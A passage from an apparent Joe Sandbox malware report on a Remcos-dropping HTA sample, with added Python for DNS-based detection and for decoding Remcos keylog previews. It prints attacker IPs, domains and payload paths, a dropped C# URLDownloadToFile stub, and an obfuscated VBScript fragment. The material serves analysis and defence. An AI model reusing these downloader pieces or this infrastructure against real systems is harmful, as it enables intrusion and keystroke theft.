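        print(f"[{f.severity.upper()}] {f.image} -> {f.query}: " + "; ".join(f.reasons))
```

On the constructed events only the two CasPol.exe lookups produce findings: the banaya.duckdns.org query is high (IOC domain, IOC IP, dynamic DNS, unusual resolver), the geoplugin.net query is medium, and the same geoplugin.net lookup from chrome.exe is silent. The powershell.exe resolution of 1017.filemail.com is deliberately not flagged: the report marks the host and its IP as not malicious, and only the specific download URL as malicious, which a DNS event cannot see.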
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559566
Start date and time: 2024-11-20 17:17:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: seethebestthignswhichgivingbestopportunities.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/22@3/4
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 79
• Number of non-executed functions: 189
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 2816 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 4220 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7040 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7604 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• VT rate limit hit for: seethebestthignswhichgivingbestopportunities.hta
Time | Type | Description
11:18:06 | API Interceptor | 139x Sleep call for process: powershell.exe modified
12:53:49 | API Interceptor | 4894044x Sleep call for process: CasPol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.3.220.29
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  • 192.3.220.29/45/HDRDDG.txt
  New order.xls | malicious | Unknown
  • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
  New order.xls | malicious | Unknown
  • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
  New order.xls | malicious | Unknown
  • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
  seemebestthingswhichevermadebybestthingsgodown.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 192.3.220.29/66/SWRTFRR.txt
  CI.xls | malicious | Remcos, HTMLPhisher
  • 192.3.220.29/66/SWRTFRR.txt
142.215.209.78
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  PO 2725724312_pdf.vbs | malicious | Unknown
  seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher
  Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher
  bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader
  #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader
  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  Order_Summary.xls | malicious | Remcos, HTMLPhisher
  kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot
  bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer
192.3.101.149
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  seemebestthingswhichevermadebybestthingsgodown.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  CI.xls | malicious | Remcos, HTMLPhisher
  seethebestthingswithgoodthingswithgreatthignsfor.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  1731343866c2de3056a60ef2333b3e4532593a69f279ecfa2002460801978b2e618aaa77bc130.dat-decoded.exe | malicious | Remcos
178.237.33.50
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  • geoplugin.net/json.gp
  sostener.vbs | malicious | Remcos
  • geoplugin.net/json.gp
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos
  • geoplugin.net/json.gp
  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader
  • geoplugin.net/json.gp
  Pago_BBVA.pdf.bat.exe | malicious | Remcos
  • geoplugin.net/json.gp
  USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
  • geoplugin.net/json.gp
  globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos
  • geoplugin.net/json.gp
  file.exe | malicious | Remcos
  • geoplugin.net/json.gp
  YYHh9QU804.exe | malicious | Remcos
  • geoplugin.net/json.gp
  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.1017.filemail.com
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  • 142.215.209.78
  PO 2725724312_pdf.vbs | malicious | Unknown
  • 142.215.209.78
  seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher
  • 142.215.209.78
  Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher
  • 142.215.209.78
  bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader
  • 142.215.209.78
  #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader
  • 142.215.209.78
  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 142.215.209.78
  Order_Summary.xls | malicious | Remcos, HTMLPhisher
  • 142.215.209.78
  kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot
  • 142.215.209.78
  bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer
  • 142.215.209.78
banaya.duckdns.org
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  • 192.3.101.149
geoplugin.net
  pi-77159.xls | malicious | Remcos, HTMLPhisher
  • 178.237.33.50
  sostener.vbs | malicious | Remcos
  • 178.237.33.50
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos
  • 178.237.33.50
  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader
  • 178.237.33.50
  Pago_BBVA.pdf.bat.exe | malicious | Remcos
  • 178.237.33.50
  USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
  • 178.237.33.50
  globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos
  • 178.237.33.50
  file.exe | malicious | Remcos
  • 178.237.33.50
  YYHh9QU804.exe | malicious | Remcos
  • 178.237.33.50
  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HUMBER-COLLEGECA | pi-77159.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | PO 2725724312_pdf.vbs | malicious | Unknown | 142.215.209.78
HUMBER-COLLEGECA | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader | 142.215.209.78
HUMBER-COLLEGECA | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader | 142.215.209.78
HUMBER-COLLEGECA | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 142.215.209.78
HUMBER-COLLEGECA | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer | 142.215.209.78
AS-COLOCROSSINGUS | generatethebstgoodpeoplesaroundtheworldwithgood.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 107.173.4.61
AS-COLOCROSSINGUS | pi-77159.xls | malicious | Remcos, HTMLPhisher | 192.3.101.149
AS-COLOCROSSINGUS | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 107.173.4.61
AS-COLOCROSSINGUS | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 172.245.123.3
AS-COLOCROSSINGUS | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | 9srIKeD54O.rtf | malicious | Unknown | 192.3.101.150
AS-COLOCROSSINGUS | exe009.exe | malicious | Emotet | 75.127.14.170
ATOM86-ASATOM86NL | pi-77159.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86NL | sostener.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | Pago_BBVA.pdf.bat.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | file.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | YYHh9QU804.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
AS-COLOCROSSINGUS | generatethebstgoodpeoplesaroundtheworldwithgood.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 107.173.4.61
AS-COLOCROSSINGUS | pi-77159.xls | malicious | Remcos, HTMLPhisher | 192.3.101.149
AS-COLOCROSSINGUS | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 107.173.4.61
AS-COLOCROSSINGUS | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 172.245.123.3
AS-COLOCROSSINGUS | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | 9srIKeD54O.rtf | malicious | Unknown | 192.3.101.150
AS-COLOCROSSINGUS | exe009.exe | malicious | Emotet | 75.127.14.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | LSMU CITATA LT 20-11-2024#U00b7pdf.vbe | malicious | Remcos, GuLoader | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | PO 2725724312_pdf.vbs | malicious | Unknown | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | prepper-wu.ps1 | malicious | Unknown | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | SnapshotPc.ps1 | malicious | Unknown | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | Isabella County Emergency Management-protected.pdf | malicious | HTMLPhisher | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | cYDCUkIGVB.exe | malicious | Unknown | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | cYDCUkIGVB.exe | malicious | Unknown | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | KRcLFIz5PCQunB7.exe | malicious | Quasar | 142.215.209.78
3b5074b1b5d032e5620f69f9f700ff0e | https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.html | malicious | Unknown | 142.215.209.78
                                                                                                        No context

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.3708727686148316
Encrypted: false
SSDEEP: 3:rhlKlf4OlXlfKl84ql55JWRal2Jl+7R0DAlBG45klovDl6v:6lfJl1ClBql55YcIeeDAlOWAv
MD5: 6D351ED623CEB288B07797B930359AF5
SHA1: 274B715B27802828FA7AFD4216E05E37195D642B
SHA-256: 31F4F7ED39FAB7C9B92E3386EAA588765E08EC3C101792EF0454232C7AAA4793
SHA-512: C03F18BFF94AEA71ABD966AB26DFFC6AC2619FB4E793790B65B178526CE2AEAEB77002ED5B984BC732981A4839390A6847448A27E0D26007795E8A7EA38686E5
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.1./.2.0. .1.2.:.5.3.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
Category: dropped
Size (bytes): 142466
Entropy (8bit): 3.674082413060924
Encrypted: false
SSDEEP: 1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
MD5: DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
SHA1: 7588E7A25BF351AC5A16ECA9B68686C7970E60E5
SHA-256: 99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
SHA-512: D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
Malicious: false
Preview: ..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. .B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o..... . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .e.s.f.a.l.f.a.m.e.n.t.o. .>. .0..... . . . . . . . .a.m.b.a.r.i.n.o. .=. .L.e.f.t.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .-. .1.). .&. .c.o.n.t.r.a.m.a.r.t.e.l.o.s. .&. .M.i.d.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.p.n.e.o.m.e.t.r.i.a.).)..... . . . . . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.c.o.n.t.r.a.m.a.r.t.e.l.o.s.).,. .a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . .L.o.o.p..... . . . ..... . . . .r.e.s.t.i.v.o. .=. .a.m.b.a.r.i.n.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...
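The Remcos logs.dat above and this dropped VBScript are both UTF-16LE files, which the report's preview renders as "c.h.a.r.s." because every non-printable byte (here the high byte of each UTF-16 code unit) is shown as a dot. What follows is an added example, not code from Joe Sandbox or from the sample: it recovers the text from such a preview by picking the byte parity that carries the printable characters, and splits the keylog into its timestamped events, window-title markers and the keystrokes typed under each title. The keylog layout is inferred only from what the preview shows ("[YYYY/MM/DD HH:MM:SS Offline Keylogger Started]" followed by "[Program Manager]"); `decode_logs_dat` and the keystroke bytes in the usage note are constructed for illustration. The VBScript preview is embedded only up to its first statement; run over it, the decoder yields `Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos)`, a replace-all helper built from InStr, Left and Mid.

```python
"""Decode Joe Sandbox previews of UTF-16LE files and parse the Remcos keylog markers.

Added example, not Joe Sandbox or Remcos code. The two previews are copied from the
report (the VBScript one truncated to its opening); the keylog layout is inferred
from the logs.dat preview only.
"""
from __future__ import annotations

import re

# Copied from the report: preview of C:\ProgramData\remcos\logs.dat (144 bytes).
LOGS_DAT_PREVIEW = (
    "....[.2.0.2.4./.1.1./.2.0. .1.2.:.5.3.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. "
    ".S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.]....."
)

# Copied from the report: opening of the dropped VBScript's preview (truncated here).
VBS_PREVIEW_HEAD = (
    "..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. "
    ".B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)"
    "..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o....."
)


def decode_utf16le_preview(preview: str) -> str:
    """Keep the byte parity that carries the printable characters.

    A '.' on that parity is ambiguous (a real '.' or a CR/LF/other control byte),
    so it is passed through unchanged; callers must not rely on dots.
    """
    even = sum(c != "." for c in preview[0::2])
    odd = sum(c != "." for c in preview[1::2])
    return preview[0::2] if even >= odd else preview[1::2]


def decode_logs_dat(data: bytes) -> str:
    """Decode an actual logs.dat (assumed UTF-16LE, optional BOM), not a preview."""
    return data.decode("utf-16-le", errors="replace").lstrip("\ufeff")


BRACKET_RE = re.compile(r"\[([^\]]*)\]")
EVENT_RE = re.compile(r"(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)")


def parse_remcos_keylog(text: str) -> dict:
    """Split a decoded keylog into events, window titles and keystrokes per title.

    Inferred from the preview: '[<date> <time> <event>]' markers, '[<window title>]'
    markers, and keystrokes as free text between markers. Dots and CR/LF around
    a keystroke run are stripped as line-break placeholders.
    """
    events, windows, keystrokes = [], [], {}
    pos, current = 0, None
    for m in BRACKET_RE.finditer(text):
        typed = text[pos:m.start()].strip(".\r\n")
        if current is not None and typed:
            keystrokes[current] = keystrokes.get(current, "") + typed
        ev = EVENT_RE.fullmatch(m.group(1))
        if ev:
            events.append((ev.group(1), ev.group(2)))
        else:
            current = m.group(1)
            windows.append(current)
        pos = m.end()
    tail = text[pos:].strip(".\r\n")
    if current is not None and tail:
        keystrokes[current] = keystrokes.get(current, "") + tail
    return {"events": events, "windows": windows, "keystrokes": keystrokes}


if __name__ == "__main__":
    print(decode_utf16le_preview(VBS_PREVIEW_HEAD))
    print(parse_remcos_keylog(decode_utf16le_preview(LOGS_DAT_PREVIEW)))
```

The preview for logs.dat decodes to a single "Offline Keylogger Started" event and one window title with nothing typed under it, which is consistent with a 144-byte file written moments after the sandbox run began. On a real logs.dat from disk, `parse_remcos_keylog(decode_logs_dat(open(path, "rb").read()))` gives the same structure with the keystrokes filled in.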

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.015105568788186
Encrypted: false
SSDEEP: 12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 8937B63DC0B37E949F38E7874886D999
SHA1: 62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
SHA-256: AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
SHA-512: 077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.901113710259376
Encrypted: false
SSDEEP: 96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5: 7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1: 22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256: 5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512: D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious: false
Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
Category: dropped
Size (bytes): 487
Entropy (8bit): 3.787386295423015
Encrypted: false
SSDEEP: 6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
MD5: 920EC087C1649B37D3E112B3D5CEB653
SHA1: 43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
SHA-256: D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
SHA-512: C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
Malicious: false
Preview: .using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
Category: dropped
Size (bytes): 377
Entropy (8bit): 5.322937001523699
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f3rDZGzxs7+AEszIcNwi23f3rDZVLx:p37Lvkmb6KwZf8WZEJZfL9
MD5: 1DECD2F404896138AEAF4BB149CE129D
SHA1: DBAE45A602BA189AA29CA656DB6E5A13ED485D8F
SHA-256: A09EF4F27DC55E8B00FEAFB882D136DBD13DBAB4362D262A7489D0ABAB205390
SHA-512: BB18505DCAC981E3485A0BB380B0091C80712EFB41AD7ED7BE6483D7E1BC0ED80D6AD3E5382A58CBA42B7F9B9F62B7EA136C19E2386254851918FA031E136BDF
Malicious: true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs"
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.842843348304877
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGSVPBG5eAdF8O6kkFa+t4tkZf8fMEWI+ycuZhNsZakSvuPNnq:6WsAdeOsa+lJ8fMn1ulsZa3vyq
                                                                                                        MD5:4B8A27BC32CF94AD8C4323CC08322660
                                                                                                        SHA1:624C19A79622A753B92CA2C156A9B9E46F1FC7E9
                                                                                                        SHA-256:625AD420A4DB4378854F2CDF072B92F47F9598B69477B6033261F81B6AEED6A8
